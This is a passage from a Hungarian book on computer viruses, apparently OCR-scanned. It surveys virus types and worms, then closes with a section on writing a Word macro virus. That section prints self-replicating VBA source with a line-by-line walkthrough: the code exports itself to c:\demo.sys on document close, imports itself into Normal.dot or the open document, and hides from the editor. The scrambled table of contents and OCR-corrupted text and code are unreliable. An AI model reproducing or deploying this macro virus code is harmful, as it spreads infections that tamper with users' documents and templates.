az ILOVEYOU és társai 5.4.2 A dropper vírust helyez el 5.4.4.4 Modul makrók 5.3.5 Word makrovírus írása 5.5.1 Alapok 5.3.5.6 Hálózati vírusok 5.5.3 Killerprogramok 5.5.4.5 Makrovírusok 5.4 A legfontosabb vírustípusok rövid áttekintése 5.9 TSR fájlvírusok 5.11 Férgek .2 Companion vírusok 5.dot fájl 5.4 Logikai bombák 5.4.1 Defektes cluster mint álcázás 5.az elvetemült támadók búvóhelyei? 5.3 A vírus felépítése Hogyan fertőz meg a vírus egy fájlt? 5.5.3 Vírusok kontra ServiceRelease 5.1 Bootszektor vírusok 5.4.5.2 Miről ismeri fel a vírusvizsgáló a vírust? 5.4.10 Update vírusok 5.3 Videokártyák .1 Minden ténykedés központja .1 Így fertőznek a bootszektor vírusok 5.7 Polimorf vírusok 5.5 Ilyet is lehet: a vírus egy Payload-ot hív meg .4.2 Modul vagy osztálymodul? 5.4.8 Stealth vagy rejtőzködő vírusok 5.4.Tartalom 5. fejezet .1.4.4.1.a Normal.2 5.12 Időzítők 5.1.

6 A vírus fájltulajdonságokat vagy szövegtartalmakat változtat meg 5.7.3 Hogyan tudott a féreg elterjedni? 5.3 „Fertőtlenítő" 5.142 A működési mód 5.7.4 A vírusvédő program kiválasztásának a szempontjai .8.6 5.8.7 Megfertőzött osztálymodulok ILOVEYOU 1385.2 Víruspajzs 5.8.5.4 A forrás .8 Hogyan működnek a vírusvizsgálók? 5.1 Mi az a féreg? 5.7 A vírus jelszóval védi a fájlt 5.1 Szkennermodul 5.5.7.8.5.kommentárokkal 5.7.

mivel az ezekkel kódolt adatokat nem lehet viszszafejteni. 1983-ban programozta az első hivatalosan ismertté vált vírust Fred Cohan a dél-kaliforniai egyetemről.1 Alapok Az FBI kódolás elleni vírust fejleszt Minden eszközzel a potenciális terroristák ellen .5 Vírusok . hogy a kemény kódolóprogramok az exporttilalom ellenére is elterjedtek.jelenti az MSNBC. Doktori disszertációjához fejlesztette ki az önmagát reprodukáló program elméletét. amellyel a kódolt adatokat már a keletkezésük helyén dekódolni lehet . mielőtt még az adatok kódolása megtörténne. A Magic Lantern azelőtt kezd működni. a vírus minden billentyűzet-bevitelt feljegyez. Az általa . Az amerikai szövetségi rendőrség. és elküldi az FBI-nak. az FBI egy eljárást fejleszt. Egy Magic Lantern nevű szoftver segítségével az FBI specialistái a jövőben egy olyan vírust tudnak becsempészni a gyanús szerverekre. Csak miután az ipar bizonyítékokat szerzett arról. úgy.com online média.. Ezután a vírus mailben fogja elküldeni magát. Az FBI-nak sok szerverrel nem lesz nehéz dolga.Veszélyes fájlok 5.. Ha a fertőzött számítógépeken elindítanak egy kódolóprogramot. amely megteremti a dekódolás előfeltételeit. A US-hatóságok szemében már régóta tüskét jelentettek az erős kódolásra alkalmas programok. hogy kódolás közben kvázi kukucskál a felhasználó válla fölött. vagy ismert biztonsági réseken becsempészi magát a szerverszoftverbe. és rögtön bizonyítékkal is szolgált. az USA fel adta a hivatalos ellenállást.

A videokártya memóriáját a vírus legfeljebb egy azonosító tárolására használhatja.2 A vírus felépítése Minden vírus három vagy gyakrabban négy programrészből áll: az első rész egyfajta ismertetőjegy. A legtöbb esetben a szoftver vagy egy meghajtó hiányosságáról van szó. A keresés csak az önmagukat kódoló vírusoknál válik problematikussá.1. vagy egy destruktív kártevőről. Gyakran éppen az ártalmatlannak vélt fájlok okozzák a legnagyobb károkat. mint a vírusoktól és következményeiktől. A vírus az egyik vírushordozóról egy másik potenciális vírushordozóra. 5. és az elfoglalt clustert (helyfoglalási egységet) hibásnak mutatja. akkor vírusellenőrzést kell végezni. A vírus befészkelődik az adathordozó egy tetszőleges helyére. amelynél a kórokozók átterjednek egyik egyedről a másikra. Ebben a részben található a programkód is. A program általában álcázva van. Ezek azonban többnyire erőteljes túlzások. a hex-pattern. az adatokat csak tárolja. Mivel a komputervírusok a biológiai vírusokhoz hasonlóan viselkednek. itt is az átviteli folyamatot nevezik fertőzésnek. De ez a hely tartalmazhatná azt a parancsot is. A valóságban jelentősen több kár éri a számítógépes rendszereket és az adataikat szabotázsoktól. hogy a felhasználó felfedezze a vírus elfoglalta tárterületet a merevlemezen.a lemez egy fertőzött bootrutinjával. Itt először egy szubrutinról van-e szó. mert egy EXE fájllal sok felhasználó már eleve óvatosan bánik. hogy felismerje. hogy a rendszer minden felhasználója megkapott minden elérési jogot. Ennek ellenére óvatosnak kell lenni: ha hirtelen olyan hibák jelennek meg. Fertőzésnek az orvostudomány azt a folyamatot nevezi. amelyet interneten. a szakszerűtlen kezeléstől vagy a hackertámadásoktól. Egy vírustámadás következtében azonban bizonyos körülmények között minden adat és program elveszhet. Ha ez a hex-pattern már ismert. mintha egy képről. a vírus bemásolja a programkódját a fájlba. Az esetleges álcázási eljárás szubrutinja is itt található.programozott vírus Unix operációs rendszer alatt futott.3 Videokártyák az elvetemült támadók búvóhelyei? A videokártyák gyakran állnak vírushordozó gyanújában. Hogy az Offíce-alkalmazások makrovírusai milyen veszélyesek lehetnek. például egy merevlemezre kerül. hogy a vírus a program indításakor azonnal aktiválódni tudjon.2 Miről ismeri fel a vírusvizsgáló a vírust? Minden vírusnak van egy jellemző bitmintája. fertőzött-e már egy fájl. és a vírus arra használja. ami csak egy kis tréfát csinál. Ártalmatlan esetben itt található az utasítás. 5. . Ezért egyetlen vírus sem tud közvetlenül a videokártya memóriájából a számítógép végrehajtható memóriájába kerülni. ami jelentős anyagi károkat okoz. amelyek védik őket a lelepleződéstől. 5. amely még nem fertőzött. az kiderül a későbbiekben. egy Word vagy egy Excel fájlról lenne szó.4. amely közepes vagy nagy katasztrófát vált ki.a bootszektor vírusoknál . Ennek a segítségével tudja bármikor ellenőrizni.1 Defektes cluster mint álcázás A vírusoknak többnyire álcázómechanizmusaik vannak. hogy meg van-e már fertőzve egy fájl. 5.1. A második rész tartalmazza a tulajdonképpeni fertőzőrutint. Ez történhet egy olyan fertőzött program elindításával. CD-n vagy lemezen keresztül lehet kapni. hogy ártalmatlan vírusról van-e szó. A legtöbb felhasználói program (tehát a vírusvizsgálók is) egyszerűen átugorják a hibás clustereket. amelyről a vírus felismeri önmagát. Persze nem vezethető vissza vírusra a számítógéppel történő munka során fellépő hibák mindegyike. Ha talál ilyet. hogy: „a következő újraindításnál formattáld a merevlemezt". vagy . Valójában ez lehetetlen: egy videokártya videomemóriája nem bootképes. A vírusok állítólag a kártya videomemóriájába fészkelik be magukat. vagy csak jelzik a hibát. fel lehet használni egy meghatározott vírus kereséséhez az adathordozón. hogy a vírus mondjuk x napon rajzoljon egy képet a monitorra. és a megmaradt tárterületet mutatják meg. A harmadik rész dönti el. Az újságokban és a televízióban újra és újra horrorisztikus híreket hallani új és veszélyes vírusokról. vagy írjon ki egy meghatározott szöveget. amely szükség esetén úgy alakítja át a fájlt. végrehajtható fájlt keres. Ez hexadecimális karaktereknek egy 10-16 bájt hosszú láncából áll. amelyek hasonló körülmények között eddig nem léptek fel. A hatása az volt. Az egyik ilyen mechanizmus például megakadályozza.

Ez egy rutin. A víruskódnak ez a fájlhoz fűzése nem okoz maradandó károsodást a fertőzött fájlon. Egyes vírusok azonban sokkal gátlástalanabbul viselkednek.A negyedik résszel zárul a kör. és ezután áttereli a beolvasást az átültetetett eredeti bootszektorra. Ha a vírus nagyobb. ahol eredetileg megszakította a folyamatot. A droppereket egy bizonyos vírus átvitelére alkalmas programként vagy egyszerűen egy szabotázs segédeszközeként írják meg. ahol a vírus megszakította a program futását. és ettől a perctől kezdve még meg nem fertőzött fájlokat keres. Egy bootszektor vírus a következőképpen terjed. egy vírust telepít a memóriába. A vírus ezen a módon olyan lemezeken is terjedhet. Ha ezt végrehajtotta. először a vírus indul el. hogy azokhoz is hozzáférkőzzön. amely utasítja a BlOS-t az operációs rendszer betöltésére. mint a vírus. Többnyire a mailektől óvnak. Ez fontos. akkor ez viszonylag észrevétlenül történhet. illetve a master boot partíciós szektort vagy a DBR-t. ahogyan a vírus beveszi magát egy programba. az elejére pedig egy hivatkozást tesz erre a kódra. Az ilyen vírusok a hajlékonylemezek bootszektorát és/vagy a master boot recordot (MBR). nem is vírussal fertőzött program. Az ilyen figyelmeztetésekben általában azt is megadják.3. Ha a bootolási kísérletnél nem talál operációs rendszert. Az alábbiakban egy rövid áttekintést adunk a legfontosabb vírustípusokról és sajátságaikról. . és minden programnál a vírusprogram címét adják meg. 5. és megfertőzze őket. akkor kompletten átírja a fájlt. Más vírusok átírják a FAT-ben található könyvtárinformációt. és annyival meghosszabbítja. amennyi helyre szüksége van. a betöltőprogram csak egy jelzést küld a képernyőre: nem rendszerlemez. illetve DOS-bootszektort fertőzik meg a merevlemezen. Több módszer kombinációja is gyakran előfordul. és egyszerűen átírnak a fájlból annyit.1 Bootszektor vírusok A leggyakrabban fellépő vírusok az olyan bootszektor vírusok. hogy milyen vírusról van szó. amelyek nem tartalmaznak programokat. a fájl. Ha a gép indításkor a bootszektorhoz ér.3 Hogyan fertőz meg a vírus egy fajit? A fájlok megfertőzésénél a legnagyobb különbségek a módban vannak. Ha a gazdaprogram. 5. a helyére pedig a saját betöltőprogramját írja.4. 5.1 így fertőznek a bootszektor vírusok A vírusok egy másik típusa áthelyezi az eredeti bootszektort. Most már minden alkalommal. ám ha lefut. a vírusbetöltő először a vírust indítja el.3. Ha egy programot elindítanak. amelyek a bootszektort és a fájlokat is meg tudják támadni. Itt található az a parancs. Emellett vannak még hibrid vírusok is. a DOS boot recordot. az a saját feladatainak a futtatása előtt először a vírusprogramra ugrik. amennyire a programkódjukhoz szükség van. mint a Form és a Stoned vírus. Az eredeti címeket a vírus egy rendezett listára helyezi. s az újabbaknak ez általában sikerül is. akkor ez először elindítja a vírust. Ha a programot elindítják. a vírus pedig elrejtőzik valahol az adathordozón. megint visszaugrik arra a helyre. amelyeknek a fájlmelléklete vírust rejt. amellyel a program a víruskód végrehajtása után visszatér oda. mikor a programot elindítják.4 A legfontosabb vírustípusok rövid áttekintése A vírusfigyelmeztetések szinte már a napi rutinhoz tartoznak az interneten. 5. A vírust az ilyen lemez is hordozhatja. mert a „fertőzésveszély" a típustól függően nagyobb vagy kisebb. mivel a nem bootképes lemezeknek is van egy minimális bootszektoruk. Felhasználóként legfeljebb a fertőzött program indulási sebességének a minimális változását vesszük észre. a vírusokat el lehet távolítani. ezért is lehet egyre nehezebben osztályozni a vírusokat. a merevlemezre vagy egy fájlba. ugyanolyan méretű vagy nagyobb.2 A dropper vírust helyez el A dropper nem vírus. majd az továbbítja az elérést a helyes címre. Minden fertőzésmódnak létezik néhány variánsa. csak fájlokat. 5. Egyes antivírus-programok megkísérlik a dropperek felismerését. mint a vendéglátója. Sok vírus egy futtatható fájl végéhez fűzi a saját programkódját.

helyette a COM program. A lemezeket. A különböző bootszektor vírusok működési módjai a részleteikben ugyan különböznek egymástól. amelyek nem DOS-alapúak. és lenyomunk valamilyen billentyűt. és innentől kezdve az indítási folyamat a megszokott módon folytatódik. Mivel azonban fogja a flopiról olvasás/flopíra írás interruptját. hogy egy vírus terjed. március 6-án a Michelangelo vírus meglepetésszerűen lecsapott a gépére.4. Telepíti magát a merevlemezre. a BIOS-t még mindig át lehet állítani egy tiszta(!) lemezről bootolásra. A vírus memóriarezidenssé válik. és ha még nincs megfertőzve. hogy egy vírus ilyen módon terjed. hogy úgy tűnjön. Betölti a lemez első szektorát a memóriába. és ezután betölti az eredeti MBR-t. a DOS először mindig a COM fajit hajtja végre. Ha egy merevlemez-problémánál a bootolás lehetetlenné válna (headcrash vagy hasonló). A fertőzött flopik bootszektoráról kerülnek fel a gépre. és így a megváltoztatott programok némelyike egyáltalán nem is veszi észre. de az alapelv mindegyiknél ugyanaz. mint a Stoned vírus. ami bekerül az A: meghajtójába. Kárt azonban ugyanúgy okozhat ezeken a gépeken is. Az. Ajánlott a számítógép fő bootszekvenciáját úgy beállítani a BIOS-ban. csak a lemezek vizsgálatakor tudják felismerni és törölni a bootszektor vírusokat. de nem sok.4. működési módjuk miatt. amelyeket kapunk. Egyes operációs rendszereknél. rátelepszik a 13h interruptra.3 Killerprogramok A killerprogramok olyan vírusok. nehogy másoknak okozzanak károkat továbbadáskor. vagy hogy milyen vírusvédő programot telepítettek rá. például készített egy újabb companion vírust egy újabb fájlhoz. második lehetőségként pedig meg lehet adni a CD-ROM meghajtót. hogy lefuttassa a kódot. Ezeket az intéző alapértelmezésben nem mutatja. tehát kioldjuk a meghajtózárat. A companion vírusok is ezt a körülményt használják ki. amit tartalmaz. ennek ellenére gondosan ellenőrizzük vírusvizsgálóval. 5. minden a legnagyobb rendben működik. Ez a flopi azonban Stoned vírussal fertőzött. Ha a vírus befejezte a ténykedését. Ha ezután megpróbáljuk elindítani az EXE fájlt. a folytatáshoz üssünk le egy tetszőleges billentyűt amennyiben nem talál rajta DOS-rendszerfájlokat. Ezt az üzenetet már ezerszer láttuk. A lemez még az A: meghajtóban van. mikor 2000.2 Companion vírusok Ha egy COM és egy EXE fájlnak ugyanaz a neve. ami mostanra azonban már nem más. hogy a számítógépe és ezáltal a lemez is bootszektor vírussal fertőzött. installálja a Stoned vírust a bootszektorába. lefut az MBR. amelyben benne van a víruskód. Volt néhány igazán sikeres companion vírus. a vírusprogram minden A: meghajtóra/-ról irányuló írási vagy olvasási műveletnél (habár azt gondoljuk. hogy először mindig a merevlemezről próbáljon bootolni. és ezzel a körforgás elölről kezdődik. hogy az EXE fájl egyáltalán nem változik. 5. és az eredeti MBR-t a merevlemez egy más pontján helyezi el. előbb vagy utóbb pedig tovább adjuk ezeknek a lemezeknek valamelyikét. és ebben keresendő a bootszektor vírusok gyakoriságának az oka is. a vírus azonban nem tudja a gépbe helyezett lemezekre másolni magát. Sokan meg vannak lepve. és így nem tud terjedni. kicseréli magára az MBR-t. A bootszektor vírusok PC-ket támadnak meg. A boot-támadás idején azonban tehetetlenek.Kapunk egy flopit adatokkal. hogy milyen operációs rendszert használ a gép. akitől a lemezt kaptuk. mikor megtudják. a valóságban a vírus ír a lemezre) megvizsgálja a lemezt. és a vírus programja lefut. és a BIOS-ban Boot from Floppy van beállítva: tehát a számítógép megpróbál erről a lemezről elindulni. elindítja az EXE programot is. amelyek a vírussal fertőzöttek. mint azt egy döbbent Unix-felhasználó megtapasztalta. A vírusvizsgálók. amely egy rögzített értéktől kezdve visszaszámol. és csak így lehet őket továbbadni (egy bootszektor-vírus nem tud például a hálózaton keresztül terjedni). még ha ez a kísérlet sikertelen is lenne. olvasásról van szó. Ha ezután elindul a gép a merevlemezről. mikor a bootszektor vírus telepíti magát. Semmi jelentősége nincs annak. Ha eléri . és elkezdjük használni az adatait. Valamikor kikapcsoljuk a számítógépet. Eddig a vírus még semmit sem csinált. A vírus erre a célra egy fertőzésszámlálót tartalmaz. azonban nem tudja. az adathordozóról történő olvasás és írás interruptjára. A lemezt behelyezzük az A: meghajtóba. és ezt a nevet begépeljük. mert abban a pillanatban. a PC ugyan megfertőződík. az operációs rendszer vagy a védőprogram még egyáltalán nincsen betöltve. vagy hogy kiírja: Nem rendszerlemez. A vírusprogramozónak az a fő előnye. A fertőzés csak a fertőzött lemezről történő indítási kísérletnél következhet be. az EXE fájlhoz készítenek egy azonos nevű COM fájlt. Az elrejtéshez gyakran a rejtett vagy a rendszer tulajdonságot adják a fájlnak. amelyek bizonyos számú fertőzés után tönkreteszik a fertőzött gép merevlemezét. tehát a vírus fut le. A következő reggelen újból bekapcsoljuk a számítógépet. így a gépünk most minden lemezt megfertőz.

valószínűleg egy e-mail mellékletével vagy egy barátja demólemezével. ezek is megfertőződnek. Még kompu- . Hogy a makrovírusok hogyan működnek. Amint megnyitunk egy fertőzött Word dokumentumot. Más vírusok minden fájlt törölnek az adathordozón. Ha ezek a kollégák ugyancsak megnyitják a mellékletet. Ezek a vírusok többnyire egy meghatározott rendszerre korlátozódnak: a bombák rendszerint csak egy megadott környezeten belül tudják reprodukálni magukat. „B" kolléga több más programot futtat saját. Az ILOVEYOU a maga idejében pontosan ilyen vírus volt.. amelyek több operációs rendszerben is tudnának terjedni. Ilyenkor minden fájl ott marad ugyan a merevlemezen.doc vagy . Olyan vírusok. belátható időn belül aligha lesznek olyan vírusok. és végrehajt egy fertőzött fájlt.4 Logikai bombák A logikai bombák a vírusok különleges fajtái: ezeknek a működésbe lépését kiválthatja egyfajta időzítő vagy egy feltétel teljesülése.4. amint bekerül egy hálózatba. hogy egy vírus. Makrovírusokat jellemzően Microsoft Word dokumentumokban (. amelyek adatfájlokat fertőznek meg. „A" kolléga megfertőzi a számítógépét. A vírus „B" kolléga gépén is memóriarezidens lesz. Egyes esetekben a vírus ilyenkor kiadja és lefuttatja a FORMÁT C: parancsot. amelyek például Mac és MS-DOS gépeken is tudnának működni. hogy a szerveren is meg tudjon fertőzni fájlokat.a nullát. még akkor sem. az is megfertőződik a vírussal. és milyen trükköket vetnek be álcázásként. A vírusnak tehát nem kell a szokásostól eltérően viselkednie ahhoz. Itt elég.dot végződéssel) és már Excel fájlokban is találunk. a koncepciójuknál fogva. ez azt jelenti. azonnal viharos sebességgel el is terjed rajta. hanem önállóan tudják reprodukálni a saját kódjukat.dot fájlt.4. 6. hálózatra csatlakozó számítógép fertőzött. ha több. barátokhoz stb. „A" kolléga néhány programot a hálózaton futtat. 2. kiváltja a rombolóakciót. A makrovírusok például egy másikra tudják cserélni a Mentés parancsot. Ezek a vírusok nem programfüggelékként terjednek a rendszerekben. a felhasznált programnyelv alapján adatokat tudnak törölni vagy módosítani. még nincsenek. és önálló programként tudják lefuttatni magukat. az megfertőzi a Normal. . 4. Először is a bootszektor vírusok nem tudnak hálózaton keresztül terjedni. Másképp történik a fertőzés az olyan vírusoknál. 7.5 Makrovírusok A makrovírusok olyan vírusok. A vírusok. 3. és ezért ezen a környezeten kívül hatástalanok. 5. 5. Más sajátosságai mellett saját magát szaporította. minden kezdődik elölről. és minden rendszer más programozási követelményeket állít. amelyek elküldik magukat a mail-címjegyzék minden címére. A klasszikus hálóvírusok az úgynevezett férgek. milyen parancsokat tudnak kiváltani. Valamennyi végrehajtott fájl megfertőződik. csak az adatállomány többé nem olvasható és használható.és így tovább. az a későbbiekben fog kiderülni. A legbarátságtalanabb változat a FAT bejegyzéseit változtatja meg. és a címjegyzékéből minden kollégája kap egy mailt a vírussal..4. 5. „A" kolléga további programokat futtat a merevlemezén. „D" és „E" kollégák bejelentkeznek. 5. mert ez a vírustípus csak flopin keresztül terjed. Ha ezután egy dokumentumot mentünk vagy nyitunk. Mivel ezek minden rendszerben mások. A legtöbben azt hiszik.. „B" kolléga bejelentkezik a szerverre. A különböző címjegyzék-bejegyzéseken keresztül a vírus gyorsan eljut az üzletfelekhez. „C". mindig egy rendszer gyenge pontjaira vannak kihegyezve. A vírus memóriarezidenssé válik. hogy fájlok olvasása és írása ugyanolyan módon történik a szerveren. és futtatják a ferőzött fájlokat. és így lavinát vált ki. ha „A" kolléga lefuttatja a fájlt.6 Hálózati vírusok Speciális hálózati vírusokból még kevés van. azonban a legtöbb vírus hálózaton is tud terjedni. mint lokálisan. például egy bizonyos szó vagy felhasználói név beírása vagy hiánya. A hálózat egy DOS-eszközt emulál. helyi merevlemezén és a szerveren. amelyek ezáltal ugyancsak megfertőződnek. Ez azonban a valóságban sokkal bonyolultabb. A fájlvírusok ezzel szemben a következőképpen fertőznek hálózaton keresztül: 1.

A komputerférgek saját magukat tudják reprodukálni.4. A hex pattern mellett ezek a vírusok nemcsak egy verziószámot tartalmaznak. Ha újabb verzió van telepítve. ennél sokkal összetettebb és nehezebb feladatot kell megoldania annak. ezek az *. valakinek le kell futtatni a fertőzött programot. 5. A vírusprogramozó ezt a programot szeretné a legjobban becsapni. ha csak megnyitjuk azt (például egy adatmentésnél bizonyos körülmények között minden fájlt megnyitnak. 5.4. Ha bootszektor vírusról van szó. Az ilyen vírusok már akkor megfertőznek egy fájlt. és aztán a fertőzött bootszektor helyett az eredeti tartalmát prezentálom. ha az még nem fertőzött. Mint a neve is mutatja. és a végrehajtható programoknak sem feltétlenül kell COM vagy EXE kitérjesztésűeknek lenniük. amikor végrehajtják. amely meghatározza.OVL fájlok.4. hogy milyen fájlok állnak rendelkezésre az adathordozón (pl. és ezeket többnyire egyetlen programozó vagy egy csoport fejleszti. amelyeket az a vírusfertőzés előtt tartalmazott. akkor lecseréli ezeket.9 TSR fájlvírusok A második leggyakoribb vírusfajta a TSR fájlvírus. A polimorf vírus olyan kártevő. akkor az a 13h interruptot használja (az adathordozók olvasása/írása). ahová eltettem. az ilyen típusú vírus fájlokat támad meg. mert a mailforgalom egyfolytában növekedett. Ezeknél nem klasszikus vírusról van szó. A stealth vírusoknál viszont. De ez még nem minden: a rutin azt is megvizsgálja. ha egy tetszőleges program megpróbálja olvasni a bootszektort. hogy gazdaprogramokhoz fűzzék magukat. Hi-hi. akkor legalább egy interruptot fogni tud. azonban van néhány eszközmeghajtó vírus is. amelyik ezzel a trükkel dolgozott. aki el akarja csípni. Ezért egy ilyen vírust nem lehet egyszerűen egy meghatározott bájtsorozatról felismerni. hogy megfertőzze. amely ellenőrzi. mert egy bootszektor vírushoz sokkal egyszerűbb álcázórutint írni. a DIR parancs). amely a fájlt olvassa. amelyek önállóan tudnak egy hálózaton terjedni. a vírus azt mondja magában: „Aha. amelyből egy helyen nem fordul elő két másolat. amelyek azonban vírust is tartalmazhatnak. 5.tercégeknél is egész részlegeket bénított meg. Ahhoz. Az 1986-ban készült Éráin vírus volt az első olyan. hanem azzal rokon zavaróprogramokról. Egyszerűen beolvasom az eredeti bootszektort onnan. amit a meghajtó tartalmaz. Az ilyen álcázási képességek azonban gyakrabban figyelhetők meg bootszektor vírusoknál. Ha igen.4. A férgek önálló programok. azok közül is általában a COM és az EXE . ami pedig a komputeres világban megjelenő vírusok 99%-ára igaz. hogy a fájlok tartalmazzák-e már a vírus egy régebbi verzióját. fájlokat. amely a víruskódok egy bizonyos repertoárja után kutat. bár ez az esetek 99%-ára igaz. Egyes vírusokat gyorsan fertőző vírusoknak is neveznek. hogy minden program. amelyek ugyanazt a bájtsorozatot tartalmaznák. 5. A Green Caterpiller fertőzőrutinját viszont minden olyan folyamat kiváltja. Használnak még más fertőzőrutinokat is. hogy a vírus fellépett-e már valamely verziójában.11 Férgek . mint fájlvírusoknál." Ezáltal a lekérdező programnak semmi szokatlan sem tűnik fel. Többnyire több. de a legtöbb esetben egy program csak akkor fertőződik meg. itt valaki látni akarja a bootszektort. egymáshoz kapcsolódó programszegmensből állnak. A vírus memóriarezidenssé válik. Családokra oszlanak.7 Polimorf vírusok Az antivírus programok leggyakrabban használt fajtája a szkenner.az ILOVEYOU és társai A komputerférgek olyan programok.) Az első gyorsan fertőző vírus a Dark Avenger volt. mint amilyen a Frodo.8 Stealth vagy rejtőzködő vírusok Ha egy vírus memóriarezidenssé tud válni.10 Update vírusok Az update vírusok különösen ravasz kórokozók. hogy egy TSR vírus terjedni tudjon. amelyeknek nincs szükségük arra. A fájlvírusok. hanem egy update rutint is. és általában minden utána elindított programot megvizsgál. akkor ezzel nem fertőz újra.4. 5. és hálózati funkciók segítségével más számítógépekre másolódnak. Egyes vírusok overlay fájlokat (programok lapozófájljai) fertőznek meg. és minden további futtatás ismét elindította a küldést. hasonló trükkel szintén el tudják titkolni a létezésüket úgy. csak azokat a bájtokat látja.

amire egy Word makrovírushoz szükség van. Attribute VB_Name = "demo" On Error Resume Next Application.dot-ot. Ebben a fájlban lehetnek a makrók. hogy mindenki látta már a Word megerősítő kérdését. hogy milyen veszély bújik meg mögöttük.VBProject. vagy kétkedőn a tiltásukat választotta. Itt különösen fontos tudni.5 Word makrovírus írása Biztos. még nem fertőzött DOCfájlba.sys" 5.5. Ez a kérdés azonban csak erre a dokumentumra érvényes.12 Időzítők Az időzítők a vírusok speciális kioldómechanizmusai. és a Normal. ha valakitől egy olyan dokumentumot kapott.dot-ból minden. A vírusprogramon belül egy rutin lekérdezi a rendszeridőt. a Normal. A UserFormok a makroprogramozás szempontjából nem érdekesek. VBE.1 Minden ténykedés központja . amelynek a sablonjában makrók voltak.4.a Normal.dot fájl A Word minden indításkor betölt egy globális fájlt. amit a VB alatt is használni tudunk. Ezt a fájlt támadják meg. nem pedig megvalósítás céljára. Elméletileg így például születésnapi üdvözletet lehet valakinek küldeni. hogy a makrók engedélyezésére kattintott. a modulok és az osztálymodulok a fontosak. A VBA lassú. A feltétel lehet a bekapcsolástól számított időtartam vagy egy előre meghatározott dátum.4 Modul makrók Az alábbiakban megtalálható minden. amelyeket bárhol újra elő lehet venni. de egy vírusíró erre mindig talál megoldást. akkor ezek a fájl megnyitásakor rendszerint ugyancsak megnyílnak és aktívvá válnak. Sub AutoCloseQ For I = 1 To NormalTemplate. hogy a Wordot megfertőzzék. valamennyire módosított formában. annak nagyon egyszerű a makrók írása. Ha ezzel valaki meg tud úszni egy Word makrovírust vagy legalább felismeri azt. amely a WordBasicben elérhetetlenné teszi a MacroCopy és Application OrganizerCopy parancsokat. 5. már megérte az ismertetés. Minden parancsnak a birtokában van. hogy Modulról vagy Osztálymodulról.ActiveVBProject. ugyanabban az órában indul el. A naptári dátumok mellett olyan rutint is lehet használni. ezért kell a fertőzéshez a Normal.Export "c:\demo.Count . Ez a makrovírus alapÖtlete. és milyen potenciális veszélyeket hordoznak ezek.2 Modul vagy osztálymodul? A vírusok mindig egy osztálymodulban vagy egy modulban vannak. hogy az egészet csak tájékoztatásnak szánjuk.5. amely a szóban forgó napon automatikusan elindul.5. de hatalmas. 5. Ezekbe kerülnek az önálló projektrészek. amelyek azután minden dokumentumra érvényesek. és minden API-funkciót is ismer (API = Application Programming Interface). kiváltja a vírus akciótartalmának a végrehajtását. 5. a vírusspecialista Aciidfreak útmutatója. amely minden nap. Itt a Beszúrás menüből kiválasztjuk.3 Vírusok kontra ServiceRelease Az SR-1 a Microsoft egy ServiceRelease-e. Először a modulokban lévő makrovírusokkal foglalkozunk.dot-ba másolni a makrovínisokat.5. 5. Lehet. VBComponents(" demo"). esetleg UserFormról lesz-e szó. Aki tud VB-ben programozni. Ha az elér egy rögzített értéket.5. Az időzítők feltételeinek a választéka szinte határtalan.VBComponents. de hangsúlyozzuk. de biztosan nem volt a tudatában annak. Egy modul elkészítéséhez az Eszközök/Makró/Visual Basic-kel megnyitjuk a Word makroszerkesztőjét. hogy aktiválja-e a makrókat is. A következő oldalakon sok minden kiderül a Word makrovírusok programozásáról. De a Word idegen szövegeknél megkérdezi. Íme. Ha a Word fájlok makrót tartalmaznak. hogy milyen trükkökkel álcázhatják a programozók a programjaikat.

Az álcázás . ahelyett. If NormalTemplate. mint a vírusé). VBComponents. VBProject Dobj.dot-ban és nem az aktív dokumentumban vagyunk. IfActiveDoaiment. és nem a Normal. hogy később melyik fájlba importál: vagy a Normal. Next I A For cikluson belül a következő értékre lépteti a ciklusváltozót. amelynek a neve „demo" (tehát. If ActivInstall = True And Normlnstall = False Then Set Dobj = NormalTemplate. VBProject Itt a feltétel fordítva is átfut: Ha a Normal. VBCpmponents(I). AutoExit. Dobj. hogy később kiváltsa az aktív dokumentumba importálást. Ebben a fájlban benne van az egész forráskód. Vannak még más autofunkciók is. amelyeket be lehet építeni. VBE. Az álcázáshoz . Next I A For cikluson belül a következő értékre lépteti a ciklusváltozót.VBProject. És a modul neve általában a vírus neve. akkor a Dobj NormalTemplate. True-ra állítja a NormalInstall-t. Hogy melyik fájlba lesz csomagolva.sys") Itt importálja az elején exportált fájlt (a vírust).Name = "demo " Then Normlnstall = True Ha a Normal. Attribute VB_Name = "demo" A Demo a modul neve. VBProject-re állítja. Most néhány funkció következik. Autoexec. Annyiszor ismétli meg a For és a Next közötti kódot. az attól függ.sys" A modult a C\demo. On Error Resume Next Ez esetleg a VB-ből már ismert. amit demo-nak hívnak (tehát a vírus).sys") End Sub így ni. Count Ez egy For ciklus.Name = "demo" Then ActivInstall = True Ha az aktív dokumentumban van egy modul. ha egy dokumentumot bezárnak. For I = 1 To NormalTemplate. hogy hibaüzenetet írna ki.VBCpmponents(I).VBProject.VBComponents.If NormalTemplate. Else If ActivInstall = False And Normlnstall = True Then Set Dobj = ActiveDocument. akkor a Dobj-t NormalTemplate. Application. VBComponents.Name NormInstall = True Next I = "demo" Then For I = l To ActiveDoctiment. Itt rögzíti.dot-ban. For I = 1 To ActiveDocument.VBProject. Sub AutocloseQ Ez a sub minden alkalommal lefut. VBProject_ Else If ActivInstall = False And Normlnstall = True Then Set Dobj = ActiveDocument.sys fájlba exportálja.VBComponents. egyszerűen a következő parancsot hajtatja végre.Import ("c:\demo. VBProject. ezenkívül a Normal. amelyek automatikusan végrehajtódnak: például AutoOpen. Annyiszor ismétli az utána következő kódot.dot-ban van egy modul.dot-on keresztül célzottan másolni is lehet a makrókat.VBProject. VBComponents ("demo"). ahány modul van a Normal.Count Ez egy For ciklus. ahány modul található az aktív dokumentumban. Ha hiba lépne fel.ActiveVBProject. vagy az aktív dokumentumba.VBComponents(I). VBProject. ami elárulná a vírust. VBProject-re lesz állítva. hogy később lehetőleg egy fertőzendő fájlba lehessen importálni. VBProject Ha az aktív dokumentumban. ezt most fogjuk most darabokra szedni.Name = "demo" Then ActivInstall = True Next I If ActivInstall = True And Normlnstall = False Then Set Dobj = NormalTemplate. True-ra állítja az Activlnstall-t.stealth A Word alapértelmezésben megmutat egy modult a VB Editorban. VBProject.dot-ban vagyunk.dot-ba.Export "c: \demo. VBComponents.Count If ActiveDocument.Import ("c: \demo. hogy mire lett állítva a Dobj. VBComponents(I).

